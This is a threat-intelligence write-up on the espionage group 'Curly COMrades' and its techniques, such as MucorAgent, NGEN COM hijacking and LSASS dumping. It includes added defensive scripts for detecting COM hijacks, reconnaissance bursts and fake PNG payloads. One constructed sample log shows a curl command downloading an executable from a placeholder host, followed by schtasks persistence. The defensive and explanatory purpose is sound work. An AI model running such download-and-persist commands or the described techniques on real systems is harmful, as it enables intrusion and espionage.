A sophisticated new cyber-espionage threat group has emerged on the global cybersecurity landscape, utilizing advanced custom malware to infiltrate government organizations and critical infrastructure entities. Security researchers have identified this previously unknown actor as “Curly COMrades,” a designation that reflects the group’s distinctive operational characteristics and technical methodology.
Emergence and Target Profile
The threat group has been actively conducting espionage operations since mid-2024, focusing primarily on government and judicial institutions in Georgia, as well as energy sector organizations in Moldova. Intelligence analysis suggests that the group’s activities align with Russian Federation geopolitical objectives, though researchers have not established definitive links to known Russian Advanced Persistent Threat (APT) groups.
The targeting pattern indicates a strategic focus on former Soviet states and their critical infrastructure, consistent with broader regional cyber-espionage campaigns observed in recent years. The selection of government judicial bodies and energy companies suggests intelligence gathering objectives related to political decision-making processes and critical infrastructure vulnerabilities.
Technical Arsenal and Attack Methodology
MucorAgent: A Sophisticated Backdoor System
The centerpiece of Curly COMrades’ operations is a custom three-stage malware framework called MucorAgent. This complex .NET-based tool functions as a stealthy backdoor capable of executing AES-encrypted PowerShell scripts while maintaining persistent access to compromised systems.
The malware architecture demonstrates advanced engineering principles, incorporating multiple layers of obfuscation and evasion techniques. MucorAgent’s design allows it to blend seamlessly with legitimate system processes while providing attackers with comprehensive remote access capabilities.
Multi-Stage Deployment Process
The attack chain begins with the deployment of multiple proxy agents across internal networks, including the Go-based Resocks tool. These proxy components are retrieved using curl.exe and establish persistence through scheduled tasks or Windows services, communicating with command-and-control infrastructure via TCP ports 443 or 8443.
For operational redundancy, the attackers deploy custom SOCKS5 servers and utilize SSH combined with Stunnel for remote port forwarding. Some SSH connections are routed through a proprietary tool called CurlCat, which employs the libcurl library and a custom Base64 alphabet to obfuscate network traffic by relaying communications through compromised legitimate websites.
Innovative Persistence Mechanisms
One of the most notable aspects of Curly COMrades’ operations is their unconventional persistence strategy. The group achieves system persistence by hijacking Component Object Model (COM) Class Identifiers (CLSIDs) to target the Native Image Generator (NGEN), a standard Windows .NET Framework component.
This persistence method exploits NGEN’s pre-compilation functionality through a seemingly disabled scheduled task that the operating system randomly enables and executes during idle periods or application deployments. While this approach provides stealth, its unpredictable execution pattern suggests the attackers likely maintain secondary, more reliable activation mechanisms.
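The report describes COM CLSID hijacking aimed at NGEN without listing the hijacked CLSIDs, so the following is an added defender-side triage script, not code from the report or from the group's tooling. It applies two generic checks that catch this class of persistence: a per-user (HKCU) CLSID that duplicates a machine-wide (HKLM) one while pointing at a different server, and any COM server binary living outside the usual system directories. The registry snapshot, CLSID strings, user names and paths are constructed placeholders; on a live host the same records would be read from HKCU\Software\Classes\CLSID and HKLM\Software\Classes\CLSID.

```python
"""Triage a COM CLSID registry snapshot for hijack indicators.

Added example, not code from the original report or from the threat actor's
tooling. The CLSIDs and paths in SAMPLE_SNAPSHOT are constructed placeholders.
"""
from dataclasses import dataclass, field

# Directories where legitimate in-process COM servers normally live.
# Anything else (user profile, ProgramData, temp) goes on the triage list.
TRUSTED_PREFIXES = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)


@dataclass(frozen=True)
class ComServer:
    hive: str    # "HKCU" or "HKLM"
    clsid: str   # "{xxxxxxxx-xxxx-...}"
    server: str  # (Default) value of InprocServer32 or LocalServer32


@dataclass
class Finding:
    clsid: str
    hive: str
    server: str
    reasons: list = field(default_factory=list)


def _normalize(path: str) -> str:
    # Strip quotes and case so "C:\Windows\..." and c:\windows\... compare equal.
    return path.strip().strip('"').lower()


def find_com_hijacks(entries):
    """Return a Finding for every entry that matches either heuristic.

    1. HKCU shadowing: COM resolves HKCU\\Software\\Classes before HKLM, so a
       per-user CLSID that duplicates a machine-wide one but points at a
       different server silently replaces it for that user.
    2. Untrusted location: the server binary is outside TRUSTED_PREFIXES.
    """
    hklm = {e.clsid.lower(): e for e in entries if e.hive == "HKLM"}
    findings = []
    for e in entries:
        reasons = []
        path = _normalize(e.server)
        machine = hklm.get(e.clsid.lower())
        if e.hive == "HKCU" and machine and path != _normalize(machine.server):
            reasons.append("HKCU entry shadows HKLM with a different server")
        if not path.startswith(TRUSTED_PREFIXES):
            reasons.append("server outside trusted directories")
        if reasons:
            findings.append(Finding(e.clsid, e.hive, e.server, reasons))
    return findings


# Constructed snapshot: CLSIDs and paths are placeholders, not real indicators.
SAMPLE_SNAPSHOT = [
    ComServer("HKLM", "{11111111-0000-0000-0000-000000000001}",
              r"C:\Windows\System32\example.dll"),
    ComServer("HKCU", "{11111111-0000-0000-0000-000000000001}",
              r"C:\Users\alice\AppData\Roaming\update.dll"),      # shadows HKLM
    ComServer("HKLM", "{22222222-0000-0000-0000-000000000002}",
              r"C:\Program Files\Vendor\vendor.dll"),
    ComServer("HKCU", "{22222222-0000-0000-0000-000000000002}",
              r"C:\Program Files\Vendor\vendor.dll"),             # same path: benign
    ComServer("HKCU", "{33333333-0000-0000-0000-000000000003}",
              r"C:\Users\alice\AppData\Local\PerUserApp\app.dll"),
]

if __name__ == "__main__":
    for f in find_com_hijacks(SAMPLE_SNAPSHOT):
        print(f.hive, f.clsid, f.server, "; ".join(f.reasons))
```

The output is a triage list, not a verdict: per-user installs of legitimate software also register CLSIDs under the user profile, so the high-value signal is the first heuristic (an HKCU entry shadowing an existing HKLM one), and the location check mainly orders what to look at first.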
Data Collection and Network Infiltration
Credential Harvesting Operations
Curly COMrades demonstrates a sophisticated understanding of Windows network architecture, repeatedly attempting to extract NTDS databases from domain controllers and dump LSASS memory from targeted systems to recover active user credentials. These activities indicate a focus on lateral movement and persistent network access rather than simple data theft.
The group extensively utilizes “living-off-the-land” techniques, executing legitimate Windows commands such as netstat, tasklist, systeminfo, wmic, and ipconfig to gather system intelligence. They also employ PowerShell Active Directory enumeration cmdlets and automated batch scripts to streamline their reconnaissance activities.
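Two of the behaviours described above translate directly into endpoint detections: the proxy-agent deployment pattern (curl.exe retrieving a binary that is then persisted with a scheduled task or service, from the Multi-Stage Deployment section) and the burst of built-in reconnaissance commands from this section. The script below is an added example, not code from the report; it runs both rules over a constructed Sysmon-style process-creation log. The one-line log format, hostnames, user names, URLs and file paths are all assumptions, not indicators from the report.

```python
"""Two behavioural detections over Windows process-creation events.

Added example, not code from the original report. Rules follow the report's
description; the log format and every event in SAMPLE_LOG are constructed.
"""
from datetime import datetime, timedelta

RECON_BINARIES = {"netstat.exe", "tasklist.exe", "systeminfo.exe",
                  "wmic.exe", "ipconfig.exe"}
PERSIST_BINARIES = {"schtasks.exe", "sc.exe"}


def parse_event(line):
    """Constructed format: '<ISO time>|<host>|<user>|<image path>|<command line>'."""
    ts, host, user, image, cmdline = line.split("|", 4)
    return {"time": datetime.fromisoformat(ts), "host": host, "user": user,
            "image": image.rsplit("\\", 1)[-1].lower(), "cmdline": cmdline}


def _curl_output_path(cmdline):
    """Return the file curl was told to write (-o/--output), or None."""
    parts = cmdline.split()
    for i, p in enumerate(parts):
        if p in ("-o", "--output") and i + 1 < len(parts):
            return parts[i + 1].strip('"')
    return None


def detect_download_then_persist(events, window=timedelta(minutes=30)):
    """curl.exe writes a file and, within `window`, the same host registers that
    path with 'schtasks.exe /create' or 'sc.exe create'."""
    downloads = []   # (time, host, output path)
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["image"] == "curl.exe":
            out = _curl_output_path(ev["cmdline"])
            if out:
                downloads.append((ev["time"], ev["host"], out))
        elif ev["image"] in PERSIST_BINARIES:
            cl = ev["cmdline"].lower()
            if "/create" not in cl and " create " not in cl:
                continue
            for t, host, out in downloads:
                if (host == ev["host"] and ev["time"] - t <= window
                        and out.lower() in cl):
                    hits.append((ev["host"], out, ev["image"]))
    return hits


def detect_recon_burst(events, window=timedelta(minutes=5), threshold=4):
    """One host+user runs at least `threshold` distinct recon binaries inside
    `window`; at most one finding per host+user pair."""
    by_key = {}
    for ev in events:
        if ev["image"] in RECON_BINARIES:
            by_key.setdefault((ev["host"], ev["user"]), []).append(ev)
    hits = []
    for (host, user), evs in by_key.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            seen = {e["image"] for e in evs[i:]
                    if e["time"] - start["time"] <= window}
            if len(seen) >= threshold:
                hits.append((host, user, sorted(seen)))
                break
    return hits


# Constructed sample log: two hosts, one of which shows both patterns.
SAMPLE_LOG = r"""
2024-09-10T08:00:00|WS01|corp\alice|C:\Windows\System32\curl.exe|curl.exe -s http://example.invalid/agent.bin -o C:\ProgramData\svc\agent.exe
2024-09-10T08:01:30|WS01|corp\alice|C:\Windows\System32\schtasks.exe|schtasks.exe /create /tn Updater /tr C:\ProgramData\svc\agent.exe /sc onlogon
2024-09-10T09:00:00|WS01|corp\alice|C:\Windows\System32\ipconfig.exe|ipconfig.exe /all
2024-09-10T09:00:05|WS01|corp\alice|C:\Windows\System32\netstat.exe|netstat.exe -ano
2024-09-10T09:00:20|WS01|corp\alice|C:\Windows\System32\tasklist.exe|tasklist.exe /v
2024-09-10T09:01:00|WS01|corp\alice|C:\Windows\System32\systeminfo.exe|systeminfo.exe
2024-09-10T13:00:00|WS02|corp\bob|C:\Windows\System32\ipconfig.exe|ipconfig.exe
2024-09-10T13:00:05|WS02|corp\bob|C:\Windows\System32\curl.exe|curl.exe https://example.invalid/notes.txt -o C:\Users\bob\notes.txt
""".strip()


def run_detections(log_text=SAMPLE_LOG):
    events = [parse_event(l) for l in log_text.splitlines() if l.strip()]
    return {"download_then_persist": detect_download_then_persist(events),
            "recon_burst": detect_recon_burst(events)}


if __name__ == "__main__":
    for rule, hits in run_detections().items():
        for hit in hits:
            print(rule, hit)
```

The second host is there to show the false-positive boundary: a lone curl download with no follow-on persistence, and a single ipconfig, trip neither rule. Thresholds and windows are starting points to tune against an environment's own baseline of administrative activity.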
Advanced Evasion Techniques
The MucorAgent backdoor incorporates anti-analysis features, including components designed to bypass Windows Antimalware Scan Interface (AMSI) protections. The malware searches for encrypted data blobs disguised as PNG image files (index.png and icon.png) downloaded from compromised websites, demonstrating sophisticated supply chain compromise techniques.
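A file called index.png or icon.png that is really an encrypted blob fails basic PNG structure checks, which gives a defender a cheap triage test for downloads and proxy caches. The following is an added example, not code from the report: it validates the PNG signature, chunk lengths and CRCs, separates a clean image from one with data appended after IEND, and measures byte entropy as a supporting signal. All byte strings are constructed; the minimal PNG is built from scratch and the "blob" is deterministic pseudo-random data standing in for ciphertext.

```python
"""Verify that a file named like a PNG actually has PNG structure.

Added example, not code from the original report. All byte strings below
are constructed; nothing here is an indicator from the report.
"""
import hashlib
import math
import struct
import zlib
from collections import Counter

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; ciphertext and compressed data sit near 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_png(data: bytes):
    """Walk the chunk list, checking lengths and CRCs.

    Returns (chunk types, offset just after IEND). Raises ValueError on the
    first structural problem so the caller gets a concrete reason.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("missing PNG signature")
    pos, types = len(PNG_SIGNATURE), []
    while pos + 12 <= len(data):               # 8-byte header + 4-byte CRC
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if crc != zlib.crc32(ctype + payload) & 0xFFFFFFFF:
            raise ValueError("bad CRC in chunk %r" % ctype)
        types.append(ctype)
        pos = end
        if ctype == b"IEND":
            if types[0] != b"IHDR":
                raise ValueError("first chunk is not IHDR")
            return types, pos
    raise ValueError("no IEND chunk")


def classify(data: bytes) -> dict:
    """'png' (clean), 'png-with-trailer' (valid image followed by extra data),
    or 'not-png' (no valid structure at all)."""
    entropy = round(shannon_entropy(data), 2)
    try:
        _types, end = parse_png(data)
    except ValueError as exc:
        return {"verdict": "not-png", "reason": str(exc), "entropy": entropy}
    trailer = len(data) - end
    if trailer:
        return {"verdict": "png-with-trailer",
                "reason": "%d bytes after IEND" % trailer, "entropy": entropy}
    return {"verdict": "png", "reason": "", "entropy": entropy}


# --- constructed samples -----------------------------------------------------

def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_minimal_png() -> bytes:
    """A valid 1x1 8-bit grayscale PNG built from scratch."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # width, height, depth, colour type, ...
    idat = zlib.compress(b"\x00\x00")                      # filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def build_fake_blob(size_blocks: int = 32) -> bytes:
    """Deterministic high-entropy bytes standing in for an encrypted payload."""
    return b"".join(hashlib.sha256(i.to_bytes(2, "big")).digest()
                    for i in range(size_blocks))


if __name__ == "__main__":
    real, fake = build_minimal_png(), build_fake_blob()
    for name, blob in (("real.png", real), ("index.png", fake), ("icon.png", real + fake)):
        print(name, classify(blob))
```

The structural check is the decisive one; entropy alone is not, because a genuine PNG's IDAT data is deflate-compressed and also reads as high entropy. Treating "png-with-trailer" as its own verdict matters because a valid image with a payload appended after IEND passes any check that stops at the signature.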
To maintain interactive control over compromised systems, the attackers install legitimate remote monitoring software, including Remote Utilities and various Remote Monitoring and Management (RMM) tools commonly used by IT professionals. This approach allows malicious activity to blend with normal administrative operations.
Operational Security and Detection Challenges
Despite employing advanced evasion techniques and leveraging legitimate tools that generate minimal suspicious network traffic, Curly COMrades’ operations produce sufficient behavioral anomalies to trigger modern Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) security sensors.
The group’s extensive efforts to maintain persistent access indicate a long-term espionage mission rather than opportunistic cybercrime. Their willingness to deploy multiple redundant access methods and custom-developed tools suggests significant resources and advanced technical capabilities.
Strategic Implications
The emergence of Curly COMrades represents a concerning evolution in state-sponsored cyber-espionage capabilities. Their sophisticated custom malware development, innovative persistence techniques, and strategic targeting of government institutions and critical infrastructure demonstrate the increasing sophistication of nation-state threat actors.
The group’s focus on former Soviet states aligns with broader geopolitical tensions and suggests potential intelligence gathering operations supporting Russian foreign policy objectives. Organizations in the targeted regions should implement enhanced monitoring for the specific techniques and indicators associated with this threat group.
Defensive Considerations
The Curly COMrades campaign highlights the importance of comprehensive endpoint monitoring and behavioral analysis in modern cybersecurity defense strategies. Traditional signature-based detection methods prove insufficient against custom malware employing advanced evasion techniques and legitimate tool abuse.
Organizations should focus on monitoring for unusual scheduled task modifications, unexpected COM object registrations, and abnormal network proxy configurations. The group’s reliance on legitimate remote administration tools also necessitates careful scrutiny of authorized remote access software installations and usage patterns.
The sophisticated nature of this threat emphasizes the critical importance of maintaining current security patches, implementing robust access controls, and deploying advanced threat detection capabilities capable of identifying subtle behavioral anomalies indicative of advanced persistent threat activity.